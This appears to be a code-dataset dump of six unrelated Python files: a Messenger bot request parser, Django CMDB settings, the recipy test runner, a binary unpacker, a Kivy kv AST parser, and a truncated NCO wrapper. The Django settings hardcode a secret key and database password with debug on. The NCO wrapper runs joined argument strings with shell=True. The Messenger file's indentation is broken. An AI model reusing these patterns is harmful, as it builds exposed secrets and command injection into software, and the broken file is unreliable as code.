Feduch/pyMessengerBotApi | messengerbot/api/messenger_requests/__init__.py | 1 | 2060 | from messengerbot.api.messenger_requests.messenger_start_request import MessengerStartRequest
from messengerbot.api.messenger_requests.messenger_postback_request import MessengerPostbackRequest
from messengerbot.api.messenger_requests.messenger_referral_request import MessengerReferralRequest
from messengerbot.api.messenger_requests.messenger_quick_reply_request import MessengerQuickReplyRequest
from messengerbot.api.messenger_requests.messenger_text_request import MessengerTextRequest
from messengerbot.api.messenger_requests.messenger_file_request import MessengerFileRequest
from messengerbot.api.messenger_requests.messenger_location_request import MessengerLocationRequest
def create_request(request_dict):
for event in request_dict['entry']:
if event.get('messaging'):
messaging = event['messaging']
for data in messaging:
if data.get('postback'):
if data['postback'].get('referral'):
return MessengerStartRequest().from_dict(data)
else:
return MessengerPostbackRequest().from_dict(data)
if data.get('referral'):
return MessengerReferralRequest().from_dict(data)
if data.get('message'):
if data['message'].get('quick_reply'):
return MessengerQuickReplyRequest().from_dict(data)
elif data['message'].get('attachments'):
attachments = data['message'].get('attachments')
for attachment in attachments:
                            if attachment['type'] == 'location':
                                # Location data shared by the user
return MessengerLocationRequest().from_dict(data)
else:
return MessengerFileRequest().from_dict(data)
else:
return MessengerTextRequest().from_dict(data) | gpl-3.0 | 6,069,836,483,418,778,000 | 58.823529 | 104 | 0.622233 | false |
hilarry/cmdb | cmdb/settings.py | 1 | 2308 | """
Django settings for cmdb project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*f)1h7v-ed7bajus^ykj0fe5n*#ld57m@4ca=a3!%v%3@o_7p#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
#'bootstrap_admin',
#'grappelli',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'device_manage',
'idcroom_manage',
'operation',
#'bootstrap3',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'cmdb.urls'
WSGI_APPLICATION = 'cmdb.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'cmdb',
'USER': 'cmdb',
'PASSWORD': 'cmdb',
'HOST': 'localhost',
'PORT': '3306',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'zh-cn'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
try:
from local_settings import *
except ImportError:
pass
| apache-2.0 | 5,920,079,684,958,420,000 | 22.313131 | 71 | 0.69974 | false |
recipy/recipy | integration_test/test_packages.py | 1 | 18672 | """
recipy test case runner.
Run tests to check that recipy logs information on input and output
functions invoked by scripts which use packages that recipy has been
configured to log.
Tests are specified using a [YAML](http://yaml.org/) (YAML Ain't
Markup Language) configuration file. YAML syntax is:
* `---` indicates the start of a document.
* `:` denotes a dictionary. `:` must be followed by a space.
* `-` denotes a list.
The test configuration file has format:
---
script: SCRIPT
[standalone: True|False]
libraries: [LIBRARY, LIBRARY, ... ]
test_cases:
- libraries: [LIBRARY, LIBRARY, ... ]
arguments: [..., ..., ...]
inputs: [INPUT, INPUT, ...]
outputs: [OUTPUT, OUTPUT, ...]
- libraries: [LIBRARY, LIBRARY, ... ]
arguments: [..., ..., ...]
inputs: [INPUT, INPUT, ...]
outputs: [OUTPUT, OUTPUT, ...]
[ skip: "Known issue with recipy" ]
[ skip_py_version: [3.4, ...] ]
- ...
---
script: SCRIPT
...
where each script to be tested is defined by:
* 'SCRIPT': script, with a relative or absolute path. For recipy
sample scripts, the script is assumed in a sub-directory
"integration_test/packages".
* 'standalone': is the script a standalone script? If "False", or if
omitted, then the script is assumed to be a recipy sample script,
runnable via the command 'python -m
integration_test.packages.<script>'.
* 'libraries': A list of zero or more libraries used by the script,
which are expected to be logged by recipy when the script is
run regardless of arguments (i.e. any libraries common to all test
cases). If none, then this can be omitted.
* One or more test cases, each of which defines:
- 'libraries': A list of zero or more libraries used by the script,
which are expected to be logged by recipy when the script is
run with the given arguments. If none, then this can be
omitted.
- 'arguments': A list of arguments to be passed to the script. If
none, then this can be omitted.
- 'inputs': A list of zero or more input files which the script will
read, and which are expected to be logged by recipy when running
the script with the arguments. If none, then this can be omitted.
- 'outputs': A list of zero or more output files which the script
will write, and which are expected to be logged by recipy when
running the script with the arguments. If none, then this can be
omitted.
- 'skip': An optional value. If present this test case is marked as
skipped. The value is the reason for skipping the test case.
- 'skip_py_version': An optional value. If present this test case is marked
as skipped if the current Python version is in the list of values. Should
be used when a patched library does not support a Python version that is
supported by recipy.
For example:
---
script: run_numpy.py
libraries: [numpy]
test_cases:
- arguments: [loadtxt]
inputs: [input.csv]
- arguments: [savetxt]
outputs: [output.csv]
- arguments: [load_and_save_txt]
inputs: [input.csv]
outputs: [output.csv]
---
script: "/home/users/user/run_my_script.py"
standalone: True
test_cases:
- arguments: [ ]
libraries: [ numpy ]
outputs: [ data.csv ]
It is up to the developer to ensure the 'libraries', 'input' and
'output' lists correctly record the libraries, input and output files
that it is expected recipy will log when the script is run with the
given arguments.
The test configuration file is provided via an environment variable,
'RECIPY_TEST_CONFIG'. If undefined, then a default of
'integration_test/config/test_packages.yml' is assumed.
"""
import os
import os.path
import sys
import pytest
from integration_test.database import DatabaseError
from integration_test import environment
from integration_test.file_utils import load_yaml
from integration_test import helpers
from integration_test import recipy_environment as recipyenv
SCRIPT = "script"
""" Test case configuration key. """
STANDALONE = "standalone"
""" Test case configuration key. """
TEST_CASES = "test_cases"
""" Test case configuration key. """
LIBRARIES = "libraries"
""" Test case configuration key. """
ARGUMENTS = "arguments"
""" Test case configuration key. """
INPUTS = "inputs"
""" Test case configuration key. """
OUTPUTS = "outputs"
""" Test case configuration key. """
SKIP = "skip"
""" Test case configuration key. """
SKIP_PY_VERSION = "skip_py_version"
""" Test case configuration key. """
TEST_CONFIG_ENV = "RECIPY_TEST_CONFIG"
""" Environment variable for recipy test configuration file name """
DEFAULT_CONFIG = "integration_test/config/test_packages.yml"
""" Default recipy test configuration file name """
DEFAULT_SAMPLES = "integration_test/packages"
""" Default recipy sample scripts directory """
class ConfigError(Exception):
"""Test configuration error."""
def __init__(self, message, exception=None):
"""Create error.
:param message: Message
:type message: str or unicode
:param exception: Exception
        :type exception: Exception
"""
super(ConfigError, self).__init__()
self._message = message
self._exception = exception
def __str__(self):
"""Get error as a formatted string.
:return: formatted string
:rtype: str or unicode
"""
message = self._message
if self._exception is not None:
message += " : " + str(self._exception)
return repr(message)
@property
def exception(self):
"""Get exception.
        :return: Exception
        :rtype: Exception
"""
return self._exception
def get_test_cases():
"""
py.test callback to associate each test script with its test
cases. This function:
* Gets the test configuration file name from the environment
variable 'RECIPY_TEST_CONFIG'. If undefined, then a default of
'integration_test/config/test_packages.yml' is assumed.
* Loads the test configuration file.
* Creates a list of standalone tuples, each representing one
test case, using get_script_test_cases.
py.test parameterized tests generates one test function per
tuple.
:return: test cases
:rtype: list of (str or unicode, str or unicode, dict)
"""
config_file = helpers.get_environment_value(TEST_CONFIG_ENV,
DEFAULT_CONFIG)
configuration = load_yaml(config_file)
return get_script_test_cases(configuration, DEFAULT_SAMPLES)
def get_test_case_function_name(script_test_case):
"""
py.test callback to generate test case function names.
Function names are of form 'script_arguments' where 'script'
and 'arguments' are the 'script_path' conjoined to the test case's
    'arguments' with all forward slashes, backslashes, colons,
semi-colons and spaces replaced by '_'.
:param script_test_case: Script path, command, test case
specification (a tuple from get_script_test_cases).
:type script_test_case: (str or unicode, str or unicode, dict)
:return: Test case function name
:rtype: str or unicode
"""
[script_path, _, test_case] = script_test_case
arguments = [str(argument) for argument in test_case[ARGUMENTS]]
function_name = "_".join(arguments)
function_name = os.path.split(script_path)[1] + "_" + function_name
for char in [" ", "\\", "/", ":", ";", "."]:
function_name = function_name.replace(char, "_")
return function_name
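# Illustrative result (derived from the rules above): for the script path
# 'integration_test/packages/run_numpy.py' with arguments ['loadtxt'], the
# generated name is 'run_numpy_py_loadtxt'.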
def get_script_test_cases(configurations, recipy_samples_directory):
"""
Creates a list of standalone tuples, each representing one test
case.
This function takes test configurations, a list of dictionaries,
each of which has a 'script', optional 'standalone' flag, optional
'libaries' list and 'test_cases', a list of one or more test cases
(each of which is a dictionary of 'libraries', 'arguments',
'inputs', 'outputs', optional 'skip').
It returns a list of tuples (script path, command, test case) where:
* script_path is the path to the script:
- If the test configuration has a 'standalone' value of "False",
or no such value, then the script is assumed to be a recipy
sample script in "integration_test/packages/".
- Otherwise, the 'script' configuration value is used as-is.
* commmand is the command-line invocation that will be used to run
the script (not including "python" or any arguments, which are
test-case specific):
- If the test configuration has a 'standalone' value of "False",
or no such value, then the command to run the script is
assumed to be "-m integration_test.packages.SCRIPT"
- Otherwise, the 'script' configuration value is used as-is.
* test_case is a single test case configuration, with any common
libraries appended to its 'libraries'.
If any test case contains a 'skip' entry then that test case is marked
up via pytest.mark.skip.
:param configurations: Test configurations
:type dict: list of dict
:param recipy_samples_directory: directory with recipy samples
:type recipy_samples_directory: str or unicode
:return: test cases
:rtype: list of (str or unicode, str or unicode, dict)
"""
test_cases = []
for configuration in configurations:
script = configuration[SCRIPT]
if STANDALONE not in configuration:
# recipy sample test
script_path = os.path.join(recipy_samples_directory, script)
# e.g. integration_test/packages/run_numpy.py
script_module = os.path.splitext(script_path)[0]
# e.g. integration_test/packages/run_numpy
script_module = script_module.replace("/", ".")
script_module = script_module.replace("\\", ".")
# e.g. integration_test.packages.run_numpy
command = ["-m", script_module]
# e.g. -m integration_test.packages.run_numpy
else:
script_path = script
command = [script]
if LIBRARIES in configuration:
common_libraries = configuration[LIBRARIES]
else:
common_libraries = []
for test_case in configuration[TEST_CASES]:
if LIBRARIES in test_case:
test_case[LIBRARIES].extend(common_libraries)
else:
test_case[LIBRARIES] = common_libraries
single_test_case = (script_path, command, test_case)
if SKIP in test_case:
reason = get_test_case_function_name(single_test_case)
reason = reason + ": " + test_case[SKIP]
single_test_case = pytest.mark.skip(
reason=reason)((single_test_case))
if SKIP_PY_VERSION in test_case:
py_version = '{}.{}'.format(sys.version_info.major,
sys.version_info.minor)
to_skip = [str(num) for num in test_case[SKIP_PY_VERSION]]
reason = get_test_case_function_name(single_test_case)
reason = reason + ": unsupported Python version " + py_version
single_test_case = pytest.mark.skipif(
py_version in to_skip,
reason=reason)((single_test_case))
test_cases.append(single_test_case)
return test_cases
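# Illustrative mapping (assumed values, derived from the logic above): the
# configuration entry
#   {script: run_numpy.py, test_cases: [{arguments: [loadtxt]}]}
# yields the tuple
#   ('integration_test/packages/run_numpy.py',
#    ['-m', 'integration_test.packages.run_numpy'],
#    {'arguments': ['loadtxt'], 'libraries': []})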
def run_test_case(script_path, command, test_case):
"""
Run a single test case. This runs a script using arguments in
test_case and validates that recipy has logged information
about the script, also using data in test_case.
test_case is assumed to have the following
entries:
* 'libraries': a list of one or more libraries e.g. ['numpy'].
* 'arguments': a list of script arguments e.g. ['loadtxt'],
['savetxt']. If none, then this can be omitted.
* 'inputs': a list of zero or more input files which running
the script with the argument will read e.g. ['data.csv']. If
none, then this can be omitted.
* 'outputs': a list of zero or more output files which running
the script with the argument will write
e.g. ['data.csv']. If none, then this can be omitted.
:param script_path: Path to the script.
:type script_path: str or unicode
:param commmand: Command-line invocation used to run the script
(not including "python" or any arguments, which are test-case
specific).
:type command: str or unicode
:param test_case: Test case configuration.
:type test_case: dict
"""
number_of_logs = 0
try:
number_of_logs =\
helpers.get_number_of_logs(recipyenv.get_recipydb())
except DatabaseError:
# Database may not exist if running tests for first time so
# give benefit of doubt at this stage and assume running script
# will bring it into life.
pass
libraries = test_case[LIBRARIES]
if ARGUMENTS in test_case:
arguments = test_case[ARGUMENTS]
else:
arguments = []
# Execute script
_, _ = helpers.execute_python(command + arguments, 0)
# Validate recipy database
log, _ = helpers.get_log(recipyenv.get_recipydb())
# Number of logs
new_number_of_logs =\
helpers.get_number_of_logs(recipyenv.get_recipydb())
assert new_number_of_logs == (number_of_logs + 1),\
("Unexpected number of logs " + new_number_of_logs)
# Script that was invoked
check_script(script_path, log["script"],
arguments, log["command_args"])
# Libraries
check_libraries(libraries, log["libraries"])
# Inputs and outputs (local filenames only)
check_input_outputs(test_case, INPUTS, log["inputs"])
check_input_outputs(test_case, OUTPUTS, log["outputs"])
# Dates
check_dates(log["date"], log["exit_date"])
# Execution environment
check_environment(log["command"], log["environment"])
# Miscellaneous
assert environment.get_user() == log["author"], "Unexpected author"
assert log["description"] == "", "Unexpected description"
def check_script(script, logged_script, arguments, logged_arguments):
"""
Check script and arguments logged by recipy.
:param script: Script specified in test configuration
:type script: str or unicode
:param logged_script: Script logged by recipy
:type logged_script: str or unicode
:param arguments: Arguments specified in test configuration
:type arguments: list
:param logged_arguments: Arguments logged by recipy
:type logged_arguments: list
"""
# Use os.path.abspath as os.path.samefile is not supported in
# Python 2 on Windows.
assert os.path.abspath(script) == os.path.abspath(logged_script),\
"Unexpected script"
assert " ".join(arguments) == logged_arguments, "Unexpected command_args"
def check_libraries(libraries, logged_libraries):
"""
Check libraries logged by recipy.
:param libraries: Libraries specified in test configuration
:type libraries: list of str or unicode
:param logged_libraries: Libraries logged by recipy
:type logged_libraries: list of str or unicode
:raises ConfigError: if any library is not installed
"""
packages = environment.get_packages()
for library in libraries:
if environment.is_package_installed(packages, library):
version = environment.get_package_version(packages, library)
library_version = library + " v" + version
assert library_version in logged_libraries,\
("Could not find library " + library_version)
else:
raise ConfigError(("Library {} is not installed".format(library)))
def check_dates(logged_start_date, logged_end_date):
"""
Check dates logged by recipy.
:param logged_start_date: Start date logged by recipy
:type logged_start_date: str or unicode
:param logged_end_date: End date logged by recipy
:type logged_end_date: str or unicode
"""
try:
start_date = environment.get_tinydatestr_as_date(logged_start_date)
except ValueError as _:
assert False, "date is not a valid date string"
try:
exit_date = environment.get_tinydatestr_as_date(logged_end_date)
except ValueError as _:
assert False, "end_date is not a valid date string"
assert start_date <= exit_date, "date is not before exit_date"
def check_environment(logged_command, logged_environment):
"""
Check environment logged by recipy.
:param logged_command: Python executable logged by recipy
:type logged_command: str or unicode
:param logged_environment: Operating system and Python
version logged by recipy
    :type logged_environment: list of str or unicode
"""
assert environment.get_python_exe() == logged_command,\
"Unexpected command"
assert environment.get_os() in logged_environment,\
"Cannot find operating system in environment"
python_version = "python " + environment.get_python_version()
assert python_version in logged_environment,\
"Cannot find Python in environment"
def check_input_outputs(test_case, io_key, logged_io):
"""
Check inputs/outputs logged by recipy.
:param test_case: Test case configuration
:type test_case: dict
:param io_key: "inputs" or "outputs", key into test_case
:type io_key: str or unicode
:param logged_io: Inputs/outputs logged by recipy
:type logged_io: list
"""
if io_key in test_case:
io_files = test_case[io_key]
else:
io_files = []
assert len(io_files) == len(logged_io),\
("Unexpected number of " + io_key)
# Convert logged files to local file names.
logged_files = [os.path.basename(file_name)
for [file_name, _] in logged_io]
for io_file in io_files:
assert io_file in logged_files,\
("Could not find " + io_key + " " + io_file)
@pytest.mark.parametrize("script_test_case",
get_test_cases(),
ids=get_test_case_function_name)
def test_scripts(script_test_case):
"""
Run a test defined in the recipy test configuration.
    :param script_test_case: Script path, command, test case
specification - consistent with a tuple from
get_script_test_cases.
:type script_test_case: (str or unicode, str or unicode, dict)
"""
(script_path, command, test_case) = script_test_case
run_test_case(script_path, command, test_case)
| apache-2.0 | -3,213,694,212,848,131,600 | 36.121272 | 78 | 0.655848 | false |
decimalbell/devnull | python/sidl/unpacker.py | 1 | 3416 | import struct
class Unpacker(object):
def __init__(self, buf):
self._buffer = buf
self._offset = 0
self._typemethods = {'b': self.unpack_int8, 'B': self.unpack_uint8,
'h': self.unpack_int16, 'H': self.unpack_uint16,
'i': self.unpack_int32, 'I': self.unpack_uint32,
'q': self.unpack_int64, 'Q': self.unpack_uint64,
'f': self.unpack_float, 'd': self.unpack_double,
's': self.unpack_string, 'm': self.unpack_message,
}
@property
def offset(self):
return self._offset
def unpack_integer(self, fmt):
value = struct.unpack_from(fmt, self._buffer, self._offset)
self._offset = self._offset + struct.calcsize(fmt)
return value[0]
def unpack_int8(self):
return self.unpack_integer('<b')
def unpack_int16(self):
return self.unpack_integer('<h')
def unpack_int32(self):
return self.unpack_integer('<l')
def unpack_int64(self):
return self.unpack_integer('<q')
def unpack_uint8(self):
return self.unpack_integer('<B')
def unpack_uint16(self):
return self.unpack_integer('<H')
def unpack_uint32(self):
return self.unpack_integer('<I')
def unpack_uint64(self):
return self.unpack_integer('<Q')
def unpack_float(self):
return float(self.unpack_string())
def unpack_double(self):
return float(self.unpack_string())
def unpack_string(self):
l = self.unpack_uint16()
s = struct.unpack_from('%ds' % (l,), self._buffer, self._offset)
self._offset = self._offset + l
return s[0].decode('utf-8')
def unpack_binary(self):
l = self.unpack_uint32()
s = struct.unpack_from('%ds' % (l,), self._buffer, self._offset)
self._offset = self._offset + l
return s[0].decode('utf-8')
def unpack_message(self, msg):
msg.unpack(self)
def unpack_list(self, l):
length = self.unpack_uint32()
if l.typecode in l.typecodes[:-1]:
for _ in range(0, length):
value = self._typemethods[l.typecode]()
l.append(value)
elif l.typecode == l.typecodes[-1]:
for _ in range(0, length):
msg = l.type()
self._typemethods[l.typecode](msg)
l.append(msg)
def unpack_set(self, s):
length = self.unpack_uint32()
if s.typecode in s.typecodes[:-1]:
for _ in range(0, length):
value = self._typemethods[s.typecode]()
s.add(value)
elif s.typecode == s.typecodes[-1]:
for _ in range(0, length):
msg = s.type()
self._typemethods[s.typecode](msg)
s.add(msg)
def unpack_dict(self, d):
length = self.unpack_uint32()
for _ in range(0, length):
# key
key = self._typemethods[d.key_typecode]()
# value
if d.value_typecode in d.typecodes[:-1]:
value = self._typemethods[d.value_typecode]()
elif d.value_typecode == d.typecodes[-1]:
value = d.value_type()
self._typemethods[d.value_typecode](value)
d[key] = value
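# Illustrative round-trip (a sketch; assumes the peer packed values in the
# little-endian, length-prefixed layout the methods above expect):
#   buf = struct.pack('<hH5s', -3, 5, b'hello')
#   u = Unpacker(buf)
#   u.unpack_int16()   # -> -3
#   u.unpack_string()  # -> 'hello' (uint16 length prefix, then UTF-8 bytes)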
| mit | -6,304,016,966,791,125,000 | 31.226415 | 79 | 0.522248 | false |
kived/kvlang | kvlang/ast_parser.py | 1 | 4502 | from functools import partial
import weakref
from kivy.compat import iteritems
from kivy.factory import Factory
from kivy.lang import ParserRuleProperty, Parser, ParserException, ParserRule as kivy_ParserRule, Builder as kivy_Builder
from kivy.logger import Logger
from kivy.weakproxy import WeakProxy
from kvlang.kvTree import DirectiveNode, WidgetNode, WidgetLikeNode, PropertyNode, CanvasNode, InstructionNode
class ParserRule(kivy_ParserRule):
__slots__ = ('ast_node', '__weakref__')
def load_ast(self, ast, **kwargs):
kwargs.setdefault('rulesonly', False)
self._current_filename = fn = kwargs.get('filename', None)
if fn in self.files:
Logger.warning(
'kvlang: The file {} is loaded multiple times, '
'you might have unwanted behaviors.'.format(fn))
try:
parser = ASTParser(ast=ast)
self.rules.extend(parser.rules)
self._clear_matchcache()
for name, cls, template in parser.templates:
self.templates[name] = (cls, template, fn)
Factory.register(name, cls=partial(self.template, name), is_template=True)
for name, baseclasses in iteritems(parser.dynamic_classes):
Factory.register(name, baseclasses=baseclasses, filename=fn)
		if kwargs['rulesonly'] and parser.root:
			filename = kwargs.get('filename', '<string>')
			raise Exception('The file <%s> also contains non-rules '
							'directives' % filename)
if fn and (parser.templates or
parser.dynamic_classes or parser.rules):
self.files.append(fn)
if parser.root:
widget = Factory.get(parser.root.name)()
self._apply_rule(widget, parser.root, parser.root)
return widget
finally:
self._current_filename = None
Builder_apply_rule = kivy_Builder._apply_rule
def _apply_rule(self, widget, rule, *args, **kwargs):
Builder_apply_rule(widget, rule, *args, **kwargs)
if hasattr(rule, 'ast_node'):
widget.ast_node = rule.ast_node
widget.ast_node.ast_widget = widget.proxy_ref
kivy_Builder._apply_rule = partial(_apply_rule, kivy_Builder)
class ASTParser(Parser):
def __init__(self, **kwargs):
self.ast = kwargs.get('ast', None)
if self.ast is None:
raise ValueError('No AST passed')
kwargs['content'] = self.ast
super(ASTParser, self).__init__(**kwargs)
def execute_directives(self):
for directive in self.ast.find_all(DirectiveNode):
self.directives.append((directive.token.line,
str(directive).strip()[2:]))
super(ASTParser, self).execute_directives()
def parse(self, ast):
lines = ast.source.splitlines()
if not lines:
return
num_lines = len(lines)
lines = list(zip(list(range(num_lines)), lines))
self.sourcecode = lines[:]
self.execute_directives()
rules = self.parse_tree(ast.tree)
for rule in rules:
rule.precompile()
def parse_tree(self, root):
if not root:
return []
nodes = root.children if root.isNil() else [root]
return self.parse_nodes(nodes)
def parse_nodes(self, nodes, level=0):
objects = []
for node in [n for n in nodes if isinstance(n, WidgetLikeNode)]:
ln = node.get_sourceline()
name = str(node)
if (level != 0
and name not in self.PROP_ALLOWED
and any(ord(z) not in self.PROP_RANGE for z in name)):
raise ParserException(self, ln, 'Invalid class name')
current_object = ParserRule(self, ln, name, level)
objects.append(current_object)
node.ast_rule = weakref.proxy(current_object)
current_object.ast_node = weakref.proxy(node)
for child in node.interesting_children():
if isinstance(child, PropertyNode):
name = child.name
value = child.parsevalue
if name == 'id':
if len(value) == 0:
raise ParserException(self, ln, 'Empty id')
if value in ('self', 'root'):
raise ParserException(self, ln,
'Invalid id, cannot be "self" or "root"')
current_object.id = value
elif len(value):
rule = ParserRuleProperty(self, ln, name, value)
if name[:3] == 'on_':
current_object.handlers.append(rule)
else:
current_object.properties[name] = rule
elif isinstance(child, CanvasNode):
canvas = self.parse_nodes([child], level + 2)
setattr(current_object, child.canvas_object, canvas[0])
elif isinstance(child, (WidgetNode, InstructionNode)):
children = self.parse_nodes([child], level + 1)
children_set = getattr(current_object, 'children', [])
children_set += children
current_object.children = children_set
return objects
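# Usage sketch (illustrative; assumes an AST object exposing `source` and
# `tree` attributes, as consumed by ASTParser.parse above):
#
#   parser = ASTParser(ast=my_ast)   # raises ValueError if no ast= is given
#   root_rule = parser.root          # root rule parsed from the kv source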
| mit | -200,474,541,999,551,460 | 29.835616 | 121 | 0.677477 | false |
nco/pynco | nco/nco.py | 1 | 19238 | """
nco module. Use Nco class as interface.
"""
import distutils.spawn
import os
import re
import shlex
import six
import subprocess
import tempfile
from distutils.version import LooseVersion
class NCOException(Exception):
def __init__(self, stdout, stderr, returncode):
super(NCOException, self).__init__()
self.stdout = stdout
self.stderr = stderr
self.returncode = returncode
self.msg = "(returncode:{0}) {1}".format(returncode, stderr)
def __str__(self):
return self.msg
class Nco(object):
def __init__(
self,
returnCdf=False,
return_none_on_error=False,
force_output=True,
cdf_module="netcdf4",
debug=0,
**kwargs
):
operators = [
"ncap2",
"ncatted",
"ncbo",
"nces",
"ncecat",
"ncflint",
"ncks",
"ncpdq",
"ncra",
"ncrcat",
"ncrename",
"ncwa",
"ncea",
]
if "NCOpath" in os.environ:
self.nco_path = os.environ["NCOpath"]
else:
self.nco_path = os.path.split(distutils.spawn.find_executable("ncks"))[0]
self.operators = operators
self.return_cdf = returnCdf
self.return_none_on_error = return_none_on_error
self.force_output = force_output
self.cdf_module = cdf_module
self.debug = debug
self.outputOperatorsPattern = [
"-H",
"--data",
"--hieronymus",
"-M",
"--Mtd",
"--Metadata",
"-m",
"--mtd",
"--metadata",
"-P",
"--prn",
"--print",
"-r",
"--revision",
"--vrs",
"--version",
"--u",
"--units",
]
self.OverwriteOperatorsPattern = ["-O", "--ovr", "--overwrite"]
self.AppendOperatorsPattern = ["-A", "--apn", "--append"]
# operators that can function with a single file
        self.SingleFileOperatorsPattern = ["ncap2", "ncatted", "ncks", "ncrename"]
self.DontForcePattern = (
self.outputOperatorsPattern
+ self.OverwriteOperatorsPattern
+ self.AppendOperatorsPattern
)
# I/O from call
self.returncode = 0
self.stdout = ""
self.stderr = ""
if kwargs:
self.options = kwargs
else:
self.options = None
def __dir__(self):
res = dir(type(self)) + list(self.__dict__.keys())
res.extend(self.operators)
return res
def call(self, cmd, inputs=None, environment=None, use_shell=False):
inline_cmd = cmd
if inputs is not None:
if isinstance(inputs, str):
inline_cmd.append(inputs)
else:
# assume it's an iterable
inline_cmd.extend(inputs)
if self.debug:
print("# DEBUG ==================================================")
if environment:
for key, val in list(environment.items()):
print("# DEBUG: ENV: {0} = {1}".format(key, val))
print("# DEBUG: CALL>> {0}".format(" ".join(inline_cmd)))
print("# DEBUG ==================================================")
        # if we're using the shell then we need to pass a single string as the command rather than an iterable
if use_shell:
inline_cmd = " ".join(inline_cmd)
try:
proc = subprocess.Popen(
inline_cmd,
shell=use_shell,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=environment,
)
except OSError:
# Argument list may have been too long, so don't use a shell
proc = subprocess.Popen(
inline_cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=environment,
)
retvals = proc.communicate()
return {
"stdout": retvals[0],
"stderr": retvals[1],
"returncode": proc.returncode,
}
def has_error(self, method_name, inputs, cmd, retvals):
if self.debug:
print(
"# DEBUG: RETURNCODE: {return_code}".format(
return_code=retvals["returncode"]
)
)
if retvals["returncode"] != 0:
print("Error in calling operator {method} with:".format(method=method_name))
print(">>> {command} <<<".format(command=" ".join(cmd)))
print("Inputs: {0!s}".format(inputs))
print(retvals["stderr"])
return True
else:
return False
def __getattr__(self, nco_command):
# shortcut to avoid calling auto_doc decorator if command doesn't exist
if nco_command not in self.operators:
raise AttributeError("Unknown command: {cmd}".format(cmd=nco_command))
# first run the auto_doc decorator, which runs the command with --help option, in order to pull in usage info
@auto_doc(nco_command, self)
def get(self, input, **kwargs):
"""
This is the function that's called when this __getattr__ "magic" function runs.
Parses options and constructs/calls an appropriate/corresponding NCO command.
:param self:
:param input:
:param kwargs:
:return:
"""
options = kwargs.pop("options", [])
force = kwargs.pop("force", self.force_output)
output = kwargs.pop("output", None)
environment = kwargs.pop("env", None)
debug = kwargs.pop("debug", self.debug)
return_cdf = kwargs.pop("returnCdf", False)
return_array = kwargs.pop("returnArray", False)
return_ma_array = kwargs.pop("returnMaArray", False)
operator_prints_out = kwargs.pop("operator_prints_out", False)
use_shell = kwargs.pop("use_shell", True)
# build the NCO command
# 1. the NCO operator
cmd = [os.path.join(self.nco_path, nco_command)]
if options:
for option in options:
if isinstance(option, str):
cmd.extend(str.split(option))
elif hasattr(option,"prn_option"):
cmd.extend(option.prn_option().split())
else:
# assume it's an iterable
cmd.extend(option)
if debug:
if type(debug) == bool:
# assume debug level is 3
cmd.append("--nco_dbg_lvl=3")
elif type(debug) == int:
cmd.append("--nco_dbg_lvl={0}".format(debug))
else:
                    raise TypeError(
                        "Unknown type for debug: {0}".format(type(debug))
                    )
if output and force and os.path.isfile(output):
# make sure overwrite is set
if debug:
print("Overwriting file: {0}".format(output))
if any([i for i in cmd if i in self.DontForcePattern]):
force = False
else:
force = False
# 2b. all other keyword args become options
if kwargs:
for key, val in list(kwargs.items()):
if val and type(val) == bool:
cmd.append("--{0}".format(key))
if cmd[-1] in self.DontForcePattern:
force = False
elif (
isinstance(val, str)
or isinstance(val, int)
or isinstance(val, float)
):
cmd.append("--{option}={value}".format(option=key, value=val))
else:
# we assume it's either a list, a tuple or any iterable
cmd.append(
"--{option}={values}".format(
option=key, values=",".join(val)
)
)
# 2c. Global options come in
if self.options:
for key, val in list(self.options.items()):
if val and type(val) == bool:
cmd.append("--" + key)
elif isinstance(val, str):
cmd.append("--{0}={1}".format(key, val))
else:
# we assume it's either a list, a tuple or any iterable
cmd.append("--{0}={1}".format(key, ",".join(val)))
# 3. Add in overwrite if necessary
if force:
cmd.append("--overwrite")
# Check if operator appends
operator_appends = False
for piece in cmd:
if piece in self.AppendOperatorsPattern:
operator_appends = True
# If operator appends and NCO version >= 4.3.7, remove -H -M -m
# and their ancillaries from outputOperatorsPattern
if operator_appends and nco_command == "ncks":
nco_version = self.version()
if LooseVersion(nco_version) >= LooseVersion("4.3.7"):
self.outputOperatorsPattern = [
"-r",
"--revision",
"--vrs",
"--version",
]
# Check if operator prints out
for piece in cmd:
if piece in self.outputOperatorsPattern:
operator_prints_out = True
if operator_prints_out:
retvals = self.call(cmd, inputs=input)
self.returncode = retvals["returncode"]
self.stdout = retvals["stdout"]
self.stderr = retvals["stderr"]
if not self.has_error(nco_command, input, cmd, retvals):
return retvals["stdout"]
# parsing can be done by 3rd party
else:
if self.return_none_on_error:
return None
else:
raise NCOException(**retvals)
else:
if output is not None:
if isinstance(output, str):
cmd.append("--output={0}".format(output))
else:
# we assume it's an iterable.
if len(output) > 1:
raise TypeError(
"Only one output allowed, must be string or 1 length iterable. "
"Recieved output: {out} with a type of {type}".format(
out=output, type=type(output)
)
)
cmd.extend("--output={0}".format(output))
elif not (nco_command in self.SingleFileOperatorsPattern):
